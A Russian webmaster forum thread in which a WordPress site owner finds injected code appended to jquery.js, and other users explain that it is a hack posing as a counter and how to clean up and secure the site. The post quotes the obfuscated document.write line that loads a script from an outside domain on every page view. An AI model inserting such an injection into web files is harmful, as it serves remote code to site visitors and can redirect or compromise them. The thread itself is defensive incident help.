Непонятный скрипт в js

Борис Лифановский
На сайте с 07.07.2006
Offline
130
3217

Здравствуйте, коллеги.

Обнаружил, что в Вордпрессе в файле /site.ru/wp-includes/js/jquery/jquery.js

в конце появились строчки

/* Write counter URL */

document.write('<sc'+'ript type="text/ja'+'vasc'+'ript" src="http://state.sml2.ru/js/counter.js"></sc'+'ript>');

Я понятия не имею, что это за счетчик, я его не устанавливал, пользуюсь только liveinternet и google analytics.

Причем какое-то время назад я уже видел это (google pagespeed жаловался, что этот файл замедляет загрузку), строчки эти убирал, функциональность сайта сохранялась..

А сейчас, смотрю, он снова появился.

Хотел проконсультироваться, каким образом это появляется в этом файле - в оригинальном файле из установочного комплекта wordpress этих строк, естественно, нет. Как разобраться, что это такое, откуда берется и, если это какая-то дыра в безопасности, то как ее закрыть?

Большое спасибо!

Lifanovsky.com ( https://www.lifanovsky.com/ ) | ClassicalMusicNews.Ru ( https://www.classicalmusicnews.ru/ )
M
На сайте с 25.12.2013
Offline
23
#1

Это не счётчик, просто маскируется под него.

Это типичный признак заражения сайта. Обычно заражение стандартных .js файлов WordPress используется для перенаправления посетителей сайта на сторонние страницы.

Вам нужно проверить сайт целиком на наличие бекдоров / веб-шеллов и прочих зловредов и постараться наладить защиту сайта (как минимум своевременно обновлять движок, плагины и не использовать плагины из сторонних источников).

Профессионально занимаюсь системным администрированием (Linux) и оптимизацией (веб)инфраструктуры. Опыт работы более 7 лет с HTML CSS PHP MySQL. Предпочитаю работать с высоконагруженными проектами.
Борис Лифановский
На сайте с 07.07.2006
Offline
130
#2

Спасибо! Я так понимаю, что просто удаление этого кода ни к чему не приведёт, дыра где-то ещё?

У меня сейчас проверяют сервер, но как проверить сам WordPress, как понять, остался ли какой-то плагин, который гадит!

M
На сайте с 25.12.2013
Offline
23
#3
lifanovsky:
Спасибо! Я так понимаю, что просто удаление этого кода ни к чему не приведёт?

С большой вероятностью удаление этого кода не исправит проблему целиком.

lifanovsky:
дыра где-то ещё?

Приведённый вами код это не дыра, а последствие взлома. Его удаление исправит одно конкретное последствие, но оставит ваш сайт в состоянии уязвимости и в будущем уязвимость могут использовать повторно, уже с более серьёзными последствиями.

lifanovsky:
У меня сейчас проверяют сервер, но как проверить сам WordPress, как понять, остался ли какой-то плагин, который гадит!

Лучше всего обратиться к специалисту.

TF-Studio
На сайте с 17.08.2010
Offline
334
#4

нанять спеца на удаление вируса

поставить сайт на мониторинг новых скриптов, дабы во время обнаружить новые взломы

Всё ещё лучший способ заработка для белых сайтов: GoGetLinks (https://www.gogetlinks.net/?inv=fahbn8).
SeVlad
На сайте с 03.11.2008
Offline
1609
#5
lifanovsky:
но как проверить сам WordPress, как понять, остался ли какой-то плагин, который гадит!

1. Сравнить файлы ядра с оригинальным дистрибутивом

2. То же самое с плагинами и темой.

3. Найти лишние файлы - которых нет в оригинальных дистр-ах.

и да,

0. Всё брать только на оф сайтах и свежих версий. От старья избавляться. В крайнем случае можно проверить айболитом, но с умом.

0.1 - /ru/forum/774117

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий